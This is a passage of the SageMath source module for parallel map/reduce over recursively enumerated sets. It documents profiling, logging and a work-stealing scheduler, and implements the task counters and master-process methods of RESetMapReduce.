during normal usage. Most of the time one should leave it set to ``True``,
unless one sets up a mechanism to consume the partial results as soon as they
arrive. See :class:`RESetParallelIterator` and in particular the ``__iter__``
method for an example of consumer use.
.. _profiling:
Profiling
---------
It is possible to profile a map/reduce computation. First we create a
:class:`RESetMapReduce` object::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
The profiling is activated by the ``profile`` parameter. The value provided
should be a prefix (including a possible directory) for the profile dump::
sage: prof = tmp_dir('RESetMR_profile') + 'profcomp'
sage: res = S.run(profile=prof) # random
[RESetMapReduceWorker-1:58] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp1
...
[RESetMapReduceWorker-1:57] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp0
...
sage: res
131071
In this example, the profiles have been dumped in files such as
``profcomp0``. One can then load and print them as follows. See
:class:`cProfile.Profile` for more details::
sage: import cProfile, pstats
sage: st = pstats.Stats(prof+'0')
sage: st.strip_dirs().sort_stats('cumulative').print_stats() # random
...
Ordered by: cumulative time
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.023 0.023 0.432 0.432 map_reduce.py:1211(run_myself)
11968 0.151 0.000 0.223 0.000 map_reduce.py:1292(walk_branch_locally)
...
<pstats.Stats instance at 0x7fedea40c6c8>
.. SEEALSO::
`The Python Profilers <https://docs.python.org/2/library/profile.html>`_
for more detail on profiling in python.
.. _logging:
Logging
-------
The computation progress is logged through a :class:`logging.Logger` in
``sage.parallel.map_reduce.logger`` together with :class:`logging.StreamHandler`
and a :class:`logging.Formatter`. They are currently configured to print
warning messages to the console.
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
.. note::
Calls to logger which involve printing the node are commented out in the
code, because the printing (to a string) of the node can be very time
consuming depending on the node and it happens before the decision whether
the logger should record the string or drop it.
.. _protocol-description:
How does it work ?
------------------
The scheduling algorithm we use here is an adaptation of :wikipedia:`Work_stealing`:
In a work stealing scheduler, each processor in a computer system has a
queue of work items (computational tasks, threads) to perform. [...]. Each
work item is initially put on the queue of the processor executing the
work item. When a processor runs out of work, it looks at the queues of
other processors and "steals" their work items. In effect, work stealing
distributes the scheduling work over idle processors, and as long as all
processors have work to do, no scheduling overhead occurs.
For communication we use Python's basic :mod:`multiprocessing` module. We
first describe the different actors and communication tools used by the
system. The work is done under the coordination of a **master** object (an
instance of :class:`RESetMapReduce`) by a bunch of **worker** objects
(instances of :class:`RESetMapReduceWorker`).
Each running map reduce instance works on a :class:`RecursivelyEnumeratedSet of
forest type<sage.combinat.backtrack.SearchForest>` called here `C` and is
coordinated by a :class:`RESetMapReduce` object called the **master**. The
master is in charge of launching the work, gathering the results and cleaning
up at the end of the computation. It doesn't perform any computation
associated with the generation of the elements of `C` nor the computation of the
mapped function. It does, however, occasionally perform a reduce, but most reducing
is by default done by the workers. Also thanks to the work-stealing algorithm,
the master is only involved in detecting the termination of the computation
but all the load balancing is done at the level of the workers.
Workers are instances of :class:`RESetMapReduceWorker`. They are responsible
for doing the actual computations: element generation, mapping and reducing.
They are also responsible for the load balancing thanks to work-stealing.
Here is a description of the attributes of the **master** relevant to the
map-reduce protocol:
- ``_results`` -- a :class:`~multiprocessing.queues.SimpleQueue` where
the master gathers the results sent by the workers.
- ``_active_tasks`` -- a :class:`~multiprocessing.Semaphore` recording
the number of active tasks. The work is complete when it reaches 0.
- ``_done`` -- a :class:`~multiprocessing.Lock` which ensures that
shutdown is done only once.
- ``_aborted`` -- a :func:`~multiprocessing.Value` storing a shared
:class:`ctypes.c_bool` which is ``True`` if the computation was aborted
before all workers ran out of work.
- ``_workers`` -- a list of :class:`RESetMapReduceWorker` objects.
Each worker is identified by its position in this list.
Each **worker** is a process (:class:`RESetMapReduceWorker` inherits from
:class:`~multiprocessing.Process`) which contains:
- ``worker._iproc`` -- the identifier of the worker that is its position in the
master's list of workers
- ``worker._todo`` -- a :class:`collections.deque` storing of nodes of the
worker. It is used as a stack by the worker. Thiefs steal from the bottom of
this queue.
- ``worker._request`` -- a :class:`~multiprocessing.queues.SimpleQueue` storing
steal request submitted to ``worker``.
- ``worker._read_task``, ``worker._write_task`` -- a
:class:`~multiprocessing.queues.Pipe` used to transfer nodes during a steal.
- ``worker._thief`` -- a :class:`~threading.Thread` which is in charge of
stealing from ``worker._todo``.
Here is a schematic of the architecture:
.. _figure-map_reduce_arch:
.. figure:: ../../media/map_reduce_arch.png
How thefts are performed
------------------------
During normal time, that is, when all workers are active, a worker ``W`` is
iterating through a loop inside
:meth:`RESetMapReduceWorker.walk_branch_locally`. Work nodes are taken from
and new nodes are appended to ``W._todo``. When a worker ``W``
runs out of work, that is, when ``worker._todo`` is empty, it tries to steal
some work (i.e., a node) from another worker. This is performed in the
:meth:`RESetMapReduceWorker.steal` method.
From the point of view of ``W``, here is what happens:
- ``W`` signals to the master that it is idle: ``master._signal_task_done``;
- ``W`` chooses a victim ``V`` at random;
- ``W`` sends a request to ``V``: it puts its identifier into ``V._request``;
- ``W`` tries to read a node from ``W._read_task``. Then three things may happen:
+ a proper node is read. Then the theft was a success and ``W`` starts
working locally on the received node.
+ ``None`` is received. This means that ``V`` was idle. Then ``W`` tries
another victim.
+ :exc:`AbortError` is received. This means either that the computation was
aborted or that it simply succeeded and that no more work is required by
``W``. Therefore an :exc:`AbortError` exception is raised leading ``W`` to
shutdown.
We now describe the protocol on the victim's side. Each worker process contains
a :class:`Thread` which we call ``T`` for thief which acts like some kind of
Trojan horse during theft. It is normally blocked waiting for a steal request.
From the point of view of ``V`` and ``T``, here is what happens:
- during normal time, ``T`` is blocked waiting on ``V._request``;
- upon steal request, ``T`` wakes up receiving the identification of ``W``;
- ``T`` signals to the master that a new task is starting by
``master._signal_task_start``;
- Two things may happen depending if the queue ``V._todo`` is empty or not.
Remark that due to the GIL, there is no parallel execution between the
victim ``V`` and its thief thread ``T``.
+ If ``V._todo`` is empty, then ``None`` is answered on
``W._write_task``. The end of the task is immediately signaled to the master
through ``master._signal_task_done``.
+ Otherwise, a node is removed from the bottom of ``V._todo``. The node is
sent to ``W`` on ``W._write_task``. The task will be ended by ``W``, that
is, when finished working on the subtree rooted at the node, ``W`` will
call ``master._signal_task_done``.
The end of the computation
--------------------------
To detect when a computation is finished, a synchronized integer is kept which
counts the number of active tasks. This is essentially a semaphore but
semaphores are broken on Darwin OSes so we ship two implementations depending
on the OS (see :class:`ActiveTaskCounter` and :class:`ActiveTaskCounterDarwin`
and the note below).
When a worker finishes working on a task, it calls
``master._signal_task_done``. This decreases the task counter
``master._active_tasks``. When it reaches 0, it means that there are no more
nodes: the work is completed. The worker executes ``master._shutdown``
which sends :exc:`AbortError` to all ``worker._request`` and
``worker._write_task`` queues. Each worker or thief thread receiving such
a message raises the corresponding exception, therefore stopping its work. A
lock called ``master._done`` ensures that shutdown is only done once.
Finally, it is also possible to interrupt the computation before its ends,
by calling ``master.abort()``. This is achieved by setting
``master._active_tasks`` to 0 and calling ``master._shutdown``.
.. warning:: The macOS Semaphore bug
Darwin OSes do not correctly implement POSIX's semaphore semantic.
Indeed, on these systems, acquire may fail and return False not only when
the semaphore is equal to zero but also **because someone else is trying
to acquire** at the same time. This makes using Semaphores impossible
on macOS so that on these systems we use a synchronized integer instead.
.. _examples:
Are there examples of classes?
------------------------------
Yes! Here they are:
- :class:`RESetMPExample` -- a simple basic example
- :class:`RESetParallelIterator` -- a more advanced example using non standard
communication configuration.
Tests
-----
Generating series for the sum of strictly decreasing lists of integers
smaller than 15::
sage: y = polygen(ZZ, 'y')
sage: R = RESetMapReduce(
....: roots=[([], 0, 0)] + [([i], i, i) for i in range(1, 15)],
....: children=lambda list_sum_last:
....: [(list_sum_last[0] + [i], list_sum_last[1] + i, i)
....: for i in range(1, list_sum_last[2])],
....: map_function=lambda li_sum_dummy: y**li_sum_dummy[1])
sage: sg = R.run()
sage: sg == prod((1 + y**i) for i in range(1, 15))
True
Classes and methods
-------------------
"""
from __future__ import print_function, absolute_import
import six
from threading import Thread
from six.moves import queue
from sage.sets.recursively_enumerated_set import RecursivelyEnumeratedSet # _generic
from sage.misc.lazy_attribute import lazy_attribute
import collections
import copy
import sys
import random
import ctypes
import logging
# Module-level logger; documented via __doc__ so it shows up in the
# reference manual.
logger = logging.getLogger(__name__)
logger.__doc__ = (
"""
A logger for :mod:`sage.parallel.map_reduce`
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
""")
# Only warnings (and above) are shown by default; uncomment one of the
# lines below for more verbose debugging output.
logger.setLevel(logging.WARN)
# logger.setLevel(logging.INFO)
# logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# The handler prints the process/thread names and a millisecond timestamp,
# which is essential when interleaving output from several workers.
formatter = logging.Formatter(
    '[%(processName)s-%(threadName)s] (%(asctime)s.%(msecs)03.f) %(message)s',
    datefmt='%H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
if six.PY2:
    import multiprocessing as mp
    from multiprocessing.queues import SimpleQueue
    # Put SimpleQueue in the multiprocessing top-level namespace for
    # compatibility with Python 3
    mp.SimpleQueue = SimpleQueue
    del SimpleQueue
else:
    # Set up a multiprocessing context to use for this module (using the
    # 'fork' method which is basically the same as on Python 2)
    import multiprocessing as mp
    mp = mp.get_context('fork')
def proc_number(max_proc=None):
    r"""
    Return the number of worker processes to use.

    The result is the number of available cores, optionally capped by
    ``max_proc``.

    INPUT:

    - ``max_proc`` -- an upper bound on the number of processes or
      ``None``.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import proc_number
        sage: proc_number() # random
        8
        sage: proc_number(max_proc=1)
        1
        sage: proc_number(max_proc=2) in (1, 2)
        True
    """
    from sage.parallel.ncpus import ncpus
    available = ncpus()
    if max_proc is None:
        return available
    return min(max_proc, available)
class AbortError(Exception):
    r"""
    Exception for aborting parallel computations.

    This is used both as exception or as abort message.

    TESTS::

        sage: from sage.parallel.map_reduce import AbortError
        sage: raise AbortError
        Traceback (most recent call last):
        ...
        AbortError
    """
    # No payload: the exception type itself is the whole message.
    pass
class ActiveTaskCounterDarwin(object):
    r"""
    Handling the number of active tasks.

    A class for handling the number of active tasks in a distributed
    computation process. This is essentially a semaphore, but Darwin OSes
    do not correctly implement POSIX's semaphore semantic, so a shared
    integer protected by a lock is used instead.
    """

    def __init__(self, task_number):
        r"""
        TESTS::

            sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
            sage: t = ATC(4)
            sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
            running ._test_new() . . . pass
        """
        # A shared C int plus a lock emulate the semaphore semantics.
        self._active_tasks = mp.Value(ctypes.c_int, task_number)
        self._lock = mp.Lock()

    def __repr__(self):
        """
        TESTS::

            sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
            sage: ATC(4)
            ActiveTaskCounter(value=4)
        """
        return "ActiveTaskCounter(value=%s)" % (self._active_tasks.value)

    def task_start(self):
        r"""
        Increment the task counter by one.

        OUTPUT:

        Calling :meth:`task_start` on a zero or negative counter returns 0,
        otherwise increment the counter and returns its value after the
        incrementation.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
            sage: c = ATC(4); c
            ActiveTaskCounter(value=4)
            sage: c.task_start()
            5
            sage: c
            ActiveTaskCounter(value=5)

        Calling :meth:`task_start` on a zero counter does nothing::

            sage: c = ATC(0)
            sage: c.task_start()
            0
            sage: c
            ActiveTaskCounter(value=0)
        """
        logger.debug("_signal_task_start called")
        with self._lock:
            count = self._active_tasks.value
            # Refusing to restart a zero counter is not strictly necessary,
            # but it allows active thieves to stop before receiving the
            # poison pill.
            if count <= 0:
                return 0
            count += 1
            self._active_tasks.value = count
            return count

    def task_done(self):
        r"""
        Decrement the task counter by one.

        OUTPUT:

        Calling :meth:`task_done` decrements the counter and returns
        its new value.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
            sage: c = ATC(4); c
            ActiveTaskCounter(value=4)
            sage: c.task_done()
            3
            sage: c
            ActiveTaskCounter(value=3)

            sage: c = ATC(0)
            sage: c.task_done()
            -1
        """
        logger.debug("_signal_task_done called")
        with self._lock:
            count = self._active_tasks.value - 1
            self._active_tasks.value = count
            return count

    def abort(self):
        r"""
        Set the task counter to zero.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
            sage: c = ATC(4); c
            ActiveTaskCounter(value=4)
            sage: c.abort()
            sage: c
            ActiveTaskCounter(value=0)
        """
        # Zeroing the counter makes every subsequent task_start return 0.
        with self._lock:
            self._active_tasks.value = 0
class ActiveTaskCounterPosix(object):
    r"""
    Handling the number of active tasks.

    A class for handling the number of active tasks in a distributed
    computation process. This is the standard implementation on POSIX
    compliant OSes. We essentially wrap a semaphore.

    .. note::

        A legitimate question is whether there is a need in keeping the two
        implementations. I ran the following experiment on my machine::

            S = RecursivelyEnumeratedSet(
                    [[]],
                    lambda l: ([l[:i] + [len(l)] + l[i:]
                                for i in range(len(l) + 1)]
                               if len(l) < NNN else []),
                    structure='forest',
                    enumeration='depth')
            %time sp = S.map_reduce(lambda z: x**len(z)); sp

        For NNN = 10, averaging a dozen of runs, I got:

        - Posix compliant implementation: 17.04 s
        - Darwin implementation: 18.26 s

        So there is a non negligible overhead. It will probably be worth it
        if we try to cythonize the code. So I'm keeping both implementations.
    """

    def __init__(self, task_number):
        r"""
        TESTS::

            sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
            sage: t = ATC(4)
            sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
            running ._test_new() . . . pass
        """
        # A plain multiprocessing semaphore holds the count directly.
        self._active_tasks = mp.Semaphore(task_number)

    def __repr__(self):
        """
        TESTS::

            sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
            sage: ATC(4)
            ActiveTaskCounter(value=4)
        """
        return "ActiveTaskCounter(value=%s)" % (self._active_tasks.get_value())

    def task_start(self):
        r"""
        Increment the task counter by one.

        OUTPUT:

        Calling :meth:`task_start` on a zero or negative counter returns 0,
        otherwise it increments the counter and returns its new value.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
            sage: c = ATC(4); c
            ActiveTaskCounter(value=4)
            sage: c.task_start()
            5
            sage: c
            ActiveTaskCounter(value=5)

        Calling :meth:`task_start` on a zero counter does nothing::

            sage: c = ATC(0)
            sage: c.task_start()
            0
            sage: c
            ActiveTaskCounter(value=0)
        """
        logger.debug("_signal_task_start called")
        # This zero test is not strictly necessary, but it allows active
        # thieves to stop before receiving the poison pill.
        if self._active_tasks._semlock._is_zero():
            return 0
        self._active_tasks.release()
        return self._active_tasks.get_value()

    task_start.__doc__ = ActiveTaskCounterDarwin.task_start.__doc__

    def task_done(self):
        r"""
        Decrement the task counter by one.

        OUTPUT:

        Calling :meth:`task_done` decrements the counter and returns
        its new value.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
            sage: c = ATC(4); c
            ActiveTaskCounter(value=4)
            sage: c.task_done()
            3
            sage: c
            ActiveTaskCounter(value=3)

            sage: c = ATC(0)
            sage: c.task_done()
            -1
        """
        logger.debug("_signal_task_done called")
        # A non-blocking acquire fails only when the semaphore is already
        # zero. That should not happen during a normal computation, but an
        # abort artificially zeroes the semaphore, so it must be handled.
        if not self._active_tasks.acquire(False):
            return -1
        return self._active_tasks.get_value()

    def abort(self):
        r"""
        Set the task counter to zero.

        EXAMPLES::

            sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
            sage: c = ATC(4); c
            ActiveTaskCounter(value=4)
            sage: c.abort()
            sage: c
            ActiveTaskCounter(value=0)
        """
        # Drain the semaphore: non-blocking acquires until it hits zero.
        while self._active_tasks.acquire(False):
            pass
# Pick the implementation matching the platform: Darwin's POSIX semaphores
# are broken (see the module docstring), so macOS gets the lock-based
# counter while every other OS uses the semaphore-based one.
if sys.platform == 'darwin':
    ActiveTaskCounter = ActiveTaskCounterDarwin
else:
    ActiveTaskCounter = ActiveTaskCounterPosix
# ActiveTaskCounter = ActiveTaskCounterDarwin # to debug Darwin implementation
class RESetMapReduce(object):
r"""
Map-Reduce on recursively enumerated sets.
INPUT:
Description of the set:
- either ``forest=f`` -- where ``f`` is a :class:`RecursivelyEnumeratedSet
of forest type<sage.combinat.backtrack.SearchForest>`
- or a triple ``roots, children, post_process`` as follows
- ``roots=r`` -- The root of the enumeration
- ``children=c`` -- a function iterating through children nodes,
given a parent node
- ``post_process=p`` -- a post-processing function
The option ``post_process`` allows for customizing the nodes that
are actually produced. Furthermore, if ``post_process(x)`` returns ``None``,
then ``x`` won't be output at all.
Description of the map/reduce operation:
- ``map_function=f`` -- (default: ``None``)
- ``reduce_function=red`` -- (default: ``None``)
- ``reduce_init=init`` -- (default: ``None``)
.. SEEALSO::
:mod:`the Map/Reduce module <sage.parallel.map_reduce>` for
details and examples.
"""
def __init__(self,
             roots=None,
             children=None,
             post_process=None,
             map_function=None,
             reduce_function=None,
             reduce_init=None,
             forest=None):
    r"""
    TESTS::

        sage: from sage.parallel.map_reduce import RESetMapReduce
        sage: R = RESetMapReduce([[]], lambda: [[]])
        sage: R
        <sage.parallel.map_reduce.RESetMapReduce object at 0x...>

    To silence the coverage checker::

        sage: TestSuite(R).run(skip=['_test_pickling'])
    """
    if forest is not None:
        # A forest already bundles roots/children/post_process, so passing
        # both would be ambiguous.
        if any(arg is not None for arg in (roots, children, post_process)):
            raise ValueError("forest arg is incompatible with roots, children and post_process")
        self._forest = forest
        self._roots = forest._roots
        self.children = forest.children
        if hasattr(forest, 'post_process'):
            self.post_process = forest.post_process
    else:
        # Only override the class-level defaults that were actually given.
        if roots is not None:
            self._roots = roots
        if children is not None:
            self.children = children
        if post_process is not None:
            self.post_process = post_process
    if map_function is not None:
        self.map_function = map_function
    if reduce_function is not None:
        self.reduce_function = reduce_function
    if reduce_init is not None:
        self._reduce_init = reduce_init
    self._profile = None
@lazy_attribute
def _forest(self):
    r"""
    The forest underlying the map-reduce computation.

    Built lazily, on first access, from the roots/children/post-process
    description stored on ``self``.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMPExample
        sage: EX = RESetMPExample()
        sage: f = EX._forest; f
        An enumerated set with a forest structure
        sage: f.an_element()
        []
    """
    return RecursivelyEnumeratedSet(self.roots(),
                                    self.children,
                                    post_process=self.post_process,
                                    structure='forest',
                                    enumeration='depth')
def roots(self):
    r"""
    Return the roots of ``self``.

    OUTPUT:

    An iterable of nodes.

    .. note:: This should be overloaded in applications.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMapReduce
        sage: S = RESetMapReduce(42)
        sage: S.roots()
        42
    """
    # Set either from the ``roots`` constructor argument or taken from the
    # given forest (see ``__init__``).
    return self._roots
def map_function(self, o):
    r"""
    Return the image of the node ``o`` under the map step.

    INPUT:

    - ``o`` -- a node

    OUTPUT:

    By default ``1``.

    .. note:: This should be overloaded in applications.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMapReduce
        sage: S = RESetMapReduce()
        sage: S.map_function(7)
        1

        sage: S = RESetMapReduce(map_function = lambda x: 3*x + 5)
        sage: S.map_function(7)
        26
    """
    # Default: count each node once, so the default map/reduce computes
    # the cardinality of the set (overridden via the constructor).
    return 1
def reduce_function(self, a, b):
    r"""
    Return the reduction of ``a`` and ``b``.

    INPUT:

    - ``a``, ``b`` -- two values to be reduced

    OUTPUT:

    By default the sum of ``a`` and ``b``.

    .. note:: This should be overloaded in applications.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMapReduce
        sage: S = RESetMapReduce()
        sage: S.reduce_function(4, 3)
        7

        sage: S = RESetMapReduce(reduce_function=lambda x,y: x*y)
        sage: S.reduce_function(4, 3)
        12
    """
    return a+b
def post_process(self, a):
    r"""
    Return the image of ``a`` under the post-processing function for ``self``.

    INPUT:

    - ``a`` -- a node

    With the default post-processing function, which is the identity function,
    this returns ``a`` itself.

    .. note:: This should be overloaded in applications.  If the overloaded
       function returns ``None`` for a node, that node is not output at all
       (see ``walk_branch_locally``).

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMapReduce
        sage: S = RESetMapReduce()
        sage: S.post_process(4)
        4

        sage: S = RESetMapReduce(post_process=lambda x: x*x)
        sage: S.post_process(4)
        16
    """
    return a
# Default initial value for a reduction; may be overridden through the
# ``reduce_init`` constructor argument.
_reduce_init = 0

def reduce_init(self):
    r"""
    Return the initial element for a reduction.

    A fresh (shallow) copy is returned on every call so that a mutable
    initial value is never shared between workers.

    .. note:: This should be overloaded in applications.

    TESTS::

        sage: from sage.parallel.map_reduce import RESetMapReduce
        sage: S = RESetMapReduce()
        sage: S.reduce_init()
        0

        sage: S = RESetMapReduce(reduce_init = 2)
        sage: S.reduce_init()
        2
    """
    return copy.copy(self._reduce_init)
def setup_workers(self, max_proc=None, reduce_locally=True):
    r"""
    Setup the communication channels.

    INPUT:

    - ``max_proc`` -- (integer) an upper bound on the number of
      worker processes.

    - ``reduce_locally`` -- whether the workers should reduce locally
      their work or sends results to the master as soon as possible.
      See :class:`RESetMapReduceWorker` for details.

    TESTS::

        sage: from sage.parallel.map_reduce import RESetMapReduce
        sage: S = RESetMapReduce()
        sage: S.setup_workers(2)
        sage: S._results
        <multiprocessing.queues.Queue object at 0x...>
        sage: len(S._workers)
        2
    """
    self._nprocess = proc_number(max_proc)
    # Queue on which workers post their (partial) results and their
    # final ``None`` sentinel (consumed by ``get_results``).
    self._results = mp.Queue()
    # Counter of currently active tasks; the computation is finished
    # when it reaches zero.
    self._active_tasks = ActiveTaskCounter(self._nprocess)
    # Lock ensuring the shutdown sequence in ``_shutdown`` runs only once.
    self._done = mp.Lock()
    # Shared flag telling every process that the run was aborted.
    self._aborted = mp.Value(ctypes.c_bool, False)
    # Flush before creating worker processes — presumably so buffered
    # output is not duplicated in forked children (TODO: confirm).
    sys.stdout.flush()
    sys.stderr.flush()
    self._workers = [RESetMapReduceWorker(self, i, reduce_locally)
                     for i in range(self._nprocess)]
def start_workers(self):
    r"""
    Launch the workers.

    The workers should have been created using :meth:`setup_workers`.

    TESTS::

        sage: from sage.parallel.map_reduce import RESetMapReduce
        sage: def children(x):
        ....:     sleep(0.5)
        ....:     return []
        sage: S = RESetMapReduce(roots=[1], children=children)
        sage: S.setup_workers(2)
        sage: S.start_workers()
        sage: all(w.is_alive() for w in S._workers)
        True

        sage: sleep(1)
        sage: all(not w.is_alive() for w in S._workers)
        True

    Cleanup::

        sage: S.finish()
    """
    if self._nprocess == 0:
        raise ValueError("No process connected")
    logger.info("Starting work with %s processes", self._nprocess)
    logger.debug("Distributing tasks")
    # Deal the root nodes out to the workers round-robin.
    nworkers = len(self._workers)
    for i, task in enumerate(self.roots()):
        self._workers[i % nworkers]._todo.append(task)
    logger.debug("Starting processes")
    sys.stdout.flush()
    sys.stderr.flush()
    for worker in self._workers:
        worker.start()
def get_results(self, timeout=None):
    r"""
    Get the results from the queue.

    OUTPUT:

    The reduction of the results of all the workers, that is, the result of
    the map/reduce computation.  Returns ``None`` if the wait for results
    timed out (in which case the computation was aborted).

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMapReduce
        sage: S = RESetMapReduce()
        sage: S.setup_workers(2)
        sage: for v in [1, 2, None, 3, None]: S._results.put(v)
        sage: S.get_results()
        6

    Cleanup::

        sage: del S._results, S._active_tasks, S._done, S._workers
    """
    res = self.reduce_init()
    active_proc = self._nprocess
    # Each worker posts its partial results followed by a final ``None``
    # sentinel; keep reducing until every worker has sent its sentinel.
    while active_proc > 0:
        try:
            logger.debug('Waiting on results; active_proc: %s, '
                         'timeout: %s, aborted: %s' %
                         (active_proc, timeout, self._aborted.value))
            newres = self._results.get(timeout=timeout)
        except queue.Empty:
            logger.debug('Timed out waiting for results; aborting')
            # If we timed out here then the abort timer should have
            # already fired, but just in case it didn't (or is in
            # progress) wait for it to finish
            self._timer.join()
            return
        if newres is not None:
            logger.debug("Got one result")
            res = self.reduce_function(res, newres)
        else:
            # ``None`` sentinel: one more worker has finished.
            active_proc -= 1
    return res
def finish(self):
    r"""
    Destroy the workers and all the communication objects.

    Communication statistics are gathered before destroying the workers.

    TESTS::

        sage: from sage.parallel.map_reduce import RESetMPExample
        sage: S = RESetMPExample(maxl=5)
        sage: S.setup_workers(2) # indirect doctest
        sage: S._workers[0]._todo.append([])
        sage: for w in S._workers: w.start()
        sage: _ = S.get_results()
        sage: S._shutdown()
        sage: S.print_communication_statistics()
        Traceback (most recent call last):
        ...
        AttributeError: 'RESetMPExample' object has no attribute '_stats'

        sage: S.finish()

        sage: S.print_communication_statistics()
        #proc: ...
        ...

        sage: _ = S.run() # cleanup

    .. SEEALSO:: :meth:`print_communication_statistics`
    """
    if not self._aborted.value:
        # Normal termination: wait for every worker to exit cleanly.
        logger.debug("Joining worker processes...")
        for worker in self._workers:
            logger.debug("Joining %s" % worker.name)
            worker.join()
        logger.debug("Joining done")
    else:
        # Aborted run: the workers may be blocked, so kill them instead.
        logger.debug("Killing worker processes...")
        for worker in self._workers:
            logger.debug("Terminating %s" % worker.name)
            worker.terminate()
        logger.debug("Killing done")
    # Drop the IPC objects, gather the per-worker statistics while the
    # worker objects still exist, then release the workers themselves.
    del self._results, self._active_tasks, self._done
    self._get_stats()
    del self._workers
def abort(self):
    r"""
    Abort the current parallel computation.

    Sets the shared ``_aborted`` flag, forces the active-task counter so
    that blocked workers wake up, then shuts the workers down.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetParallelIterator
        sage: S = RESetParallelIterator([[]],
        ....:     lambda l: [l + [0], l + [1]] if len(l) < 17 else [])
        sage: it = iter(S)
        sage: next(it)  # random
        []
        sage: S.abort()
        sage: hasattr(S, 'work_queue')
        False

    Cleanup::

        sage: S.finish()
    """
    logger.info("Abort called")
    # Order matters: flag first so ``finish`` knows to terminate rather
    # than join, then release the task counter, then send poison pills.
    self._aborted.value = True
    self._active_tasks.abort()
    self._shutdown()
def _shutdown(self):
    r"""
    Shutdown the workers.

    Sends a poison pill to all workers and their thief thread.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetParallelIterator
        sage: S = RESetParallelIterator( [[]],
        ....:     lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
        sage: S.setup_workers(2)
        sage: for w in S._workers: w.start()
        sage: S._shutdown()

    Cleanup::

        sage: S.finish()
    """
    # The non-blocking acquire of ``_done`` guarantees the poison pills
    # are sent exactly once even if several callers race into shutdown.
    if self._done.acquire(False):
        logger.debug("***************** FINISHED ******************")
        logger.debug("Sending poison pills")
        # Stop each worker's thief thread ...
        for worker in self._workers:
            worker._request.put(AbortError)
        # ... and unblock each worker waiting on a steal answer.
        for worker in self._workers:
            worker._write_task.send(AbortError)
def _signal_task_start(self):
    r"""
    Signal a starting task.

    Used by the worker to signal that a new task is starting. As soon as
    there are no more active task, the work is done, in which case an
    :exc:`AbortError` is raised.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetParallelIterator
        sage: S = RESetParallelIterator( [[]],
        ....:     lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
        sage: S.setup_workers(2)
        sage: S._active_tasks
        ActiveTaskCounter(value=2)
        sage: S._signal_task_start()
        sage: S._active_tasks
        ActiveTaskCounter(value=3)

    Signaling one time too many raises an :exc:`AbortError`::

        sage: S._signal_task_done()
        sage: S._signal_task_done()
        sage: S._signal_task_done()
        Traceback (most recent call last):
        ...
        AbortError
    """
    # ``task_start`` returns 0 when the counter was already at zero,
    # i.e. the computation is finished or aborted.
    if self._active_tasks.task_start() == 0:
        raise AbortError
def _signal_task_done(self):
    r"""
    Signal a task is done.

    Used by the worker to signal that a task is done. As soon as
    there are no more active task, the work is done, in which case an
    :exc:`AbortError` is raised.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetParallelIterator
        sage: S = RESetParallelIterator(
        ....:     [[]],
        ....:     lambda l: [l + [0], l + [1]] if len(l) < 20 else [])
        sage: S.setup_workers(2)
        sage: S._active_tasks
        ActiveTaskCounter(value=2)
        sage: S._signal_task_done()
        sage: S._active_tasks
        ActiveTaskCounter(value=1)

        sage: S._signal_task_done()
        Traceback (most recent call last):
        ...
        AbortError

    Cleanup::

        sage: del S._results, S._active_tasks, S._done, S._workers
    """
    # We test if the semaphore counting the number of active tasks is
    # becoming negative. This should not happen in normal
    # computations. However, in case of abort, we artificially put the
    # semaphore to 0 to stop the computation so that it is needed.
    if self._active_tasks.task_done() <= 0:
        logger.debug("raising AbortError")
        self._shutdown()
        raise AbortError
def random_worker(self):
    r"""
    Return a random worker.

    OUTPUT:

    A worker for ``self`` chosen uniformly at random.

    EXAMPLES::

        sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
        sage: from threading import Thread
        sage: EX = RESetMPExample(maxl=6)
        sage: EX.setup_workers(2)
        sage: EX.random_worker()
        <RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
        sage: EX.random_worker() in EX._workers
        True

    Cleanup::

        sage: del EX._results, EX._active_tasks, EX._done, EX._workers
    """
    # ``random.choice`` is the idiomatic (and equivalent) form of
    # ``self._workers[random.randint(0, len(self._workers) - 1)]``.
    return random.choice(self._workers)
def run(self,
        max_proc=None,
        reduce_locally=True,
        timeout=None,
        profile=None):
    r"""
    Run the computations.

    INPUT:
